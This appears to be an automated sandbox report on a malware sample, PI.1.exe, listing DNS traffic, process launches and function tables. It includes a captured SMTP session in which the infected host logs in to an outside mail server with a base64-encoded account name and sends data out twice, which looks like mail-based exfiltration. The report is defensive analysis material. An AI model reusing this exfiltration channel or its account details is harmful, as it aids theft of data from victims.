Mar 18, 2024 14:30:57.253304005 CET | 53 | 49740 | 1.1.1.1 | 192.168.2.11 |
Mar 18, 2024 14:30:59.160237074 CET | 57213 | 53 | 192.168.2.11 | 1.1.1.1 |
Mar 18, 2024 14:30:59.250303030 CET | 53 | 57213 | 1.1.1.1 | 192.168.2.11 |
Mar 18, 2024 14:31:03.335611105 CET | 49912 | 53 | 192.168.2.11 | 1.1.1.1 |
Mar 18, 2024 14:31:04.243828058 CET | 53 | 49912 | 1.1.1.1 | 192.168.2.11 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Mar 18, 2024 14:30:57.144936085 CET | 192.168.2.11 | 1.1.1.1 | 0x2932 | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Mar 18, 2024 14:30:59.160237074 CET | 192.168.2.11 | 1.1.1.1 | 0x100c | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Mar 18, 2024 14:31:03.335611105 CET | 192.168.2.11 | 1.1.1.1 | 0xd7c8 | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Mar 18, 2024 14:30:57.253304005 CET | 1.1.1.1 | 192.168.2.11 | 0x2932 | No error (0) | | | 104.128.228.214 | A (IP address) | IN (0x0001) | false |
Mar 18, 2024 14:30:59.250303030 CET | 1.1.1.1 | 192.168.2.11 | 0x100c | No error (0) | | | 104.26.13.205 | A (IP address) | IN (0x0001) | false |
Mar 18, 2024 14:30:59.250303030 CET | 1.1.1.1 | 192.168.2.11 | 0x100c | No error (0) | | | 104.26.12.205 | A (IP address) | IN (0x0001) | false |
Mar 18, 2024 14:30:59.250303030 CET | 1.1.1.1 | 192.168.2.11 | 0x100c | No error (0) | | | 172.67.74.152 | A (IP address) | IN (0x0001) | false |
Mar 18, 2024 14:31:04.243828058 CET | 1.1.1.1 | 192.168.2.11 | 0xd7c8 | No error (0) | | scootero.cl | | CNAME (Canonical name) | IN (0x0001) | false |
Mar 18, 2024 14:31:04.243828058 CET | 1.1.1.1 | 192.168.2.11 | 0xd7c8 | No error (0) | | | 177.221.140.242 | A (IP address) | IN (0x0001) | false |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.11 | 49715 | 104.128.228.214 | 443 | 7712 | C:\Program Files (x86)\Windows Mail\wab.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-03-18 13:30:57 UTC | 186 | OUT | |
2024-03-18 13:30:57 UTC | 223 | IN | |
2024-03-18 13:30:57 UTC | 7969 | IN | |
2024-03-18 13:30:58 UTC | 8000 | IN | |
2024-03-18 13:30:58 UTC | 8000 | IN | |
2024-03-18 13:30:58 UTC | 8000 | IN | |
2024-03-18 13:30:58 UTC | 8000 | IN | |
2024-03-18 13:30:58 UTC | 8000 | IN | |
2024-03-18 13:30:58 UTC | 8000 | IN | |
2024-03-18 13:30:58 UTC | 8000 | IN | |
2024-03-18 13:30:58 UTC | 8000 | IN | |
2024-03-18 13:30:58 UTC | 8000 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
1 | 192.168.2.11 | 49716 | 104.26.13.205 | 443 | 7712 | C:\Program Files (x86)\Windows Mail\wab.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-03-18 13:30:59 UTC | 155 | OUT | |
2024-03-18 13:30:59 UTC | 211 | IN | |
2024-03-18 13:30:59 UTC | 14 | IN |
Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands |
---|---|---|---|---|---|
Mar 18, 2024 14:31:05.876562119 CET | 587 | 49717 | 177.221.140.242 | 192.168.2.11 | 220-cloud242.americahost.cl ESMTP Exim 4.96.2 #2 Mon, 18 Mar 2024 10:31:05 -0300 220- We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail. |
Mar 18, 2024 14:31:05.876825094 CET | 49717 | 587 | 192.168.2.11 | 177.221.140.242 | EHLO 035347 |
Mar 18, 2024 14:31:06.106491089 CET | 587 | 49717 | 177.221.140.242 | 192.168.2.11 | 250-cloud242.americahost.cl Hello 035347 [191.96.227.194] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP |
Mar 18, 2024 14:31:06.107126951 CET | 49717 | 587 | 192.168.2.11 | 177.221.140.242 | AUTH login c2VuZGluZzAxQHNjb290ZXJvLmNs |
Mar 18, 2024 14:31:06.337042093 CET | 587 | 49717 | 177.221.140.242 | 192.168.2.11 | 334 UGFzc3dvcmQ6 |
Mar 18, 2024 14:31:06.585319996 CET | 587 | 49717 | 177.221.140.242 | 192.168.2.11 | 235 Authentication succeeded |
Mar 18, 2024 14:31:06.585750103 CET | 49717 | 587 | 192.168.2.11 | 177.221.140.242 | MAIL FROM:<sending01@scootero.cl> |
Mar 18, 2024 14:31:06.815315008 CET | 587 | 49717 | 177.221.140.242 | 192.168.2.11 | 250 OK |
Mar 18, 2024 14:31:06.815548897 CET | 49717 | 587 | 192.168.2.11 | 177.221.140.242 | RCPT TO:<receiving01@scootero.cl> |
Mar 18, 2024 14:31:07.064551115 CET | 587 | 49717 | 177.221.140.242 | 192.168.2.11 | 250 Accepted |
Mar 18, 2024 14:31:07.064724922 CET | 49717 | 587 | 192.168.2.11 | 177.221.140.242 | DATA |
Mar 18, 2024 14:31:07.294204950 CET | 587 | 49717 | 177.221.140.242 | 192.168.2.11 | 354 Enter message, ending with "." on a line by itself |
Mar 18, 2024 14:31:07.295506954 CET | 49717 | 587 | 192.168.2.11 | 177.221.140.242 | . |
Mar 18, 2024 14:31:07.546400070 CET | 587 | 49717 | 177.221.140.242 | 192.168.2.11 | 250 OK id=1rmD51-00EmIk-2i |
Mar 18, 2024 14:31:07.645462990 CET | 49717 | 587 | 192.168.2.11 | 177.221.140.242 | QUIT |
Mar 18, 2024 14:31:08.076515913 CET | 587 | 49717 | 177.221.140.242 | 192.168.2.11 | 221 cloud242.americahost.cl closing connection |
Mar 18, 2024 14:31:08.522958994 CET | 587 | 49718 | 177.221.140.242 | 192.168.2.11 | 220-cloud242.americahost.cl ESMTP Exim 4.96.2 #2 Mon, 18 Mar 2024 10:31:08 -0300 220- We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail. |
Mar 18, 2024 14:31:08.523412943 CET | 49718 | 587 | 192.168.2.11 | 177.221.140.242 | EHLO 035347 |
Mar 18, 2024 14:31:08.742866039 CET | 587 | 49718 | 177.221.140.242 | 192.168.2.11 | 250-cloud242.americahost.cl Hello 035347 [191.96.227.194] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP |
Mar 18, 2024 14:31:08.743076086 CET | 49718 | 587 | 192.168.2.11 | 177.221.140.242 | AUTH login c2VuZGluZzAxQHNjb290ZXJvLmNs |
Mar 18, 2024 14:31:08.962687969 CET | 587 | 49718 | 177.221.140.242 | 192.168.2.11 | 334 UGFzc3dvcmQ6 |
Mar 18, 2024 14:31:09.194453001 CET | 587 | 49718 | 177.221.140.242 | 192.168.2.11 | 235 Authentication succeeded |
Mar 18, 2024 14:31:09.194699049 CET | 49718 | 587 | 192.168.2.11 | 177.221.140.242 | MAIL FROM:<sending01@scootero.cl> |
Mar 18, 2024 14:31:09.413757086 CET | 587 | 49718 | 177.221.140.242 | 192.168.2.11 | 250 OK |
Mar 18, 2024 14:31:09.413950920 CET | 49718 | 587 | 192.168.2.11 | 177.221.140.242 | RCPT TO:<receiving01@scootero.cl> |
Mar 18, 2024 14:31:09.642729998 CET | 587 | 49718 | 177.221.140.242 | 192.168.2.11 | 250 Accepted |
Mar 18, 2024 14:31:09.642939091 CET | 49718 | 587 | 192.168.2.11 | 177.221.140.242 | DATA |
Mar 18, 2024 14:31:09.862199068 CET | 587 | 49718 | 177.221.140.242 | 192.168.2.11 | 354 Enter message, ending with "." on a line by itself |
Mar 18, 2024 14:31:09.862977982 CET | 49718 | 587 | 192.168.2.11 | 177.221.140.242 | . |
Mar 18, 2024 14:31:10.118055105 CET | 587 | 49718 | 177.221.140.242 | 192.168.2.11 | 250 OK id=1rmD54-00EmQp-1J |
Target ID: | 0 |
Start time: | 14:30:26 |
Start date: | 18/03/2024 |
Path: | C:\Users\user\Desktop\PI.1.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x400000 |
File size: | 676'400 bytes |
MD5 hash: | FC8B93107558429854146361DA62E618 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | low |
Has exited: | true |
Target ID: | 3 |
Start time: | 14:30:28 |
Start date: | 18/03/2024 |
Path: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x210000 |
File size: | 433'152 bytes |
MD5 hash: | C32CA4ACFCC635EC1EA6ED8A34DF5FAC |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | high |
Has exited: | true |
Target ID: | 4 |
Start time: | 14:30:28 |
Start date: | 18/03/2024 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff68cce0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 9 |
Start time: | 14:30:29 |
Start date: | 18/03/2024 |
Path: | C:\Windows\SysWOW64\cmd.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xc30000 |
File size: | 236'544 bytes |
MD5 hash: | D0FCE3AFA6AA1D58CE9FA336CC2B675B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 13 |
Start time: | 14:30:51 |
Start date: | 18/03/2024 |
Path: | C:\Program Files (x86)\Windows Mail\wab.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x320000 |
File size: | 516'608 bytes |
MD5 hash: | 251E51E2FEDCE8BB82763D39D631EF89 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | moderate |
Has exited: | false |
Execution Graph
Execution Coverage: | 20.8% |
Dynamic/Decrypted Code Coverage: | 0% |
Signature Coverage: | 21.2% |
Total number of Nodes: | 1323 |
Total number of Limit Nodes: | 36 |
Graph
Function 0040326A Relevance: 86.2, APIs: 33, Strings: 16, Instructions: 401, Tags: string, file, com, COMMON, Uniqueness Score: -1.00%
Function 004052B8 Relevance: 68.5, APIs: 36, Strings: 3, Instructions: 284, Tags: window, clipboard, memory, COMMON, Uniqueness Score: -1.00%
Function 004066E2 Relevance: 5.4, APIs: 4, Instructions: 382, Tags: COMMON, Uniqueness Score: -1.00%
Function 00403C06 Relevance: 59.8, APIs: 32, Strings: 2, Instructions: 345, Tags: window, string, COMMON, Uniqueness Score: -1.00%
Function 00403863 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215, Tags: string, registry, COMMON, Uniqueness Score: -1.00%
Function 0040603C Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 207, Tags: string, COMMON, Uniqueness Score: -1.00%
Function 00401767 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145, Tags: string, time, COMMON, Uniqueness Score: -1.00%
Function 00405179 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72, Tags: string, window, COMMON, Uniqueness Score: -1.00%
Function 00406384 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36, Tags: library, COMMON, Uniqueness Score: -1.00%
Function 0040237B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71, Tags: registry, string, COMMON, Uniqueness Score: -1.00%
Function 00405AD6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47, Tags: string, COMMON, Uniqueness Score: -1.00%
Function 00405EE7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45, Tags: registry, COMMON, Uniqueness Score: -1.00%
Function 004056FA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24, Tags: process, COMMON, Uniqueness Score: -1.00%
Function 00406B17 Relevance: 5.2, APIs: 4, Instructions: 236, Tags: COMMON, Uniqueness Score: -1.00%
Function 00406D18 Relevance: 5.2, APIs: 4, Instructions: 208, Tags: COMMON, Uniqueness Score: -1.00%
Function 00406A2E Relevance: 5.2, APIs: 4, Instructions: 205, Tags: COMMON, Uniqueness Score: -1.00%
Function 00406533 Relevance: 5.2, APIs: 4, Instructions: 198, Tags: COMMON, Uniqueness Score: -1.00%
Function 00406981 Relevance: 5.2, APIs: 4, Instructions: 180, Tags: COMMON, Uniqueness Score: -1.00%
Function 00406A9F Relevance: 5.2, APIs: 4, Instructions: 170, Tags: COMMON, Uniqueness Score: -1.00%
Function 004069EB Relevance: 5.2, APIs: 4, Instructions: 168, Tags: COMMON, Uniqueness Score: -1.00%
Function 00401B37 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72, Tags: memory, COMMON, Uniqueness Score: -1.00%
Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43, Tags: window, COMMON, Uniqueness Score: -1.00%
Function 0040524C Relevance: 3.0, APIs: 2, Instructions: 32, Tags: com, COMMON, Uniqueness Score: -1.00%
Function 0040156B Relevance: 3.0, APIs: 2, Instructions: 23, Tags: COMMON, Uniqueness Score: -1.00%
Function 00405BEF Relevance: 3.0, APIs: 2, Instructions: 16, Tags: file, COMMON, Uniqueness Score: -1.00%
Function 00405BCA Relevance: 3.0, APIs: 2, Instructions: 13, Tags: COMMON, Uniqueness Score: -1.00%
Function 004056C5 Relevance: 3.0, APIs: 2, Instructions: 9, Tags: COMMON, Uniqueness Score: -1.00%
Function 00405C72 Relevance: 1.5, APIs: 1, Instructions: 22, Tags: file, COMMON, Uniqueness Score: -1.00%
Function 00405CA1 Relevance: 1.5, APIs: 1, Instructions: 22, Tags: file, COMMON, Uniqueness Score: -1.00%
Function 0040412A Relevance: 1.5, APIs: 1, Instructions: 9, Tags: window, COMMON, Uniqueness Score: -1.00%
Function 00404113 Relevance: 1.5, APIs: 1, Instructions: 6, Tags: window, COMMON, Uniqueness Score: -1.00%
Function 00403222 Relevance: 1.5, APIs: 1, Instructions: 6, Tags: COMMON, Uniqueness Score: -1.00%
Function 00404100 Relevance: 1.5, APIs: 1, Instructions: 4, Tags: COMMON, Uniqueness Score: -1.00%
Function 00404AF5 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481, Tags: window, memory, COMMON, Uniqueness Score: -1.00%
Function 00404579 Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 275, Tags: string, COMMON
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0040580B Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 004027FB Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0040427B Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 207windowstringCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00405D49 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 131stringmemoryCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00402D04 Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 40timeCOMMON
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00404145 Relevance: 12.1, APIs: 8, Instructions: 61COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 004025E5 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 151fileCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00404A43 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00404935 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00402537 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67stringCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00401CFA Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00401D56 Relevance: 7.5, APIs: 5, Instructions: 38COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00401BDF Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 004059CE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00402D8A Relevance: 6.0, APIs: 4, Instructions: 33COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 004050ED Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00405A1A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00405B54 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0514F3F8 Relevance: .3, Instructions: 281COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 07AE1640 Relevance: 24.9, Strings: 19, Instructions: 1173COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 07AECA88 Relevance: 14.7, Strings: 11, Instructions: 928COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 07AE5440 Relevance: 10.4, Strings: 8, Instructions: 373COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 07AEFA95 Relevance: 7.8, Strings: 6, Instructions: 256COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 07AE0778 Relevance: 6.8, Strings: 5, Instructions: 574COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 07AE5418 Relevance: 6.6, Strings: 5, Instructions: 309COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 07AE4A28 Relevance: 5.7, Strings: 4, Instructions: 680COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 07AE3DF5 Relevance: 5.6, Strings: 4, Instructions: 614COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 07AE8298 Relevance: 5.6, Strings: 4, Instructions: 581COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 07AE47F0 Relevance: 5.6, Strings: 4, Instructions: 561COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 07AED34C Relevance: 5.4, Strings: 4, Instructions: 426COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 07AEC1A0 Relevance: 5.4, Strings: 4, Instructions: 384COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 07AEC1F8 Relevance: 5.4, Strings: 4, Instructions: 360COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 07AED4E0 Relevance: 5.3, Strings: 4, Instructions: 334COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 07AED336 Relevance: 5.3, Strings: 4, Instructions: 332COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 07AE4696 Relevance: 4.3, Strings: 3, Instructions: 591COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 07AED1C6 Relevance: 4.3, Strings: 3, Instructions: 559COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 07AE3E00 Relevance: 4.3, Strings: 3, Instructions: 532COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0514B908 Relevance: 4.2, Strings: 3, Instructions: 463COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 07AE479F Relevance: 4.2, Strings: 3, Instructions: 432COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 07AED2AD Relevance: 4.2, Strings: 3, Instructions: 406COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 07AE50A4 Relevance: 3.0, Strings: 2, Instructions: 465COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 07AE1B0E Relevance: 2.9, Strings: 2, Instructions: 422COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 07AE6160 Relevance: 2.7, Strings: 2, Instructions: 241COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 07AEFCC8 Relevance: 2.6, Strings: 2, Instructions: 132COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 07AE0C30 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 07AE4A1E Relevance: 1.7, Strings: 1, Instructions: 497COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 07AE1624 Relevance: 1.6, Strings: 1, Instructions: 398COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 07AE6144 Relevance: 1.5, Strings: 1, Instructions: 217COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 07AE58E0 Relevance: 1.4, Strings: 1, Instructions: 102COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 051499B0 Relevance: .7, Instructions: 661COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0514ADE8 Relevance: .3, Instructions: 347COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 051472A0 Relevance: .3, Instructions: 315COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0514F3EC Relevance: .3, Instructions: 288COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 051497F5 Relevance: .3, Instructions: 278COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 07AE5D58 Relevance: .2, Instructions: 238COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 05142AA0 Relevance: .2, Instructions: 219COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 05147A68 Relevance: .2, Instructions: 194COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 05147BD6 Relevance: .2, Instructions: 188COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 051477F9 Relevance: .1, Instructions: 124COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 05147A53 Relevance: .1, Instructions: 119COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 07AE827C Relevance: .1, Instructions: 119COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0514B0EF Relevance: .1, Instructions: 117COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 05142BB0 Relevance: .1, Instructions: 111COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
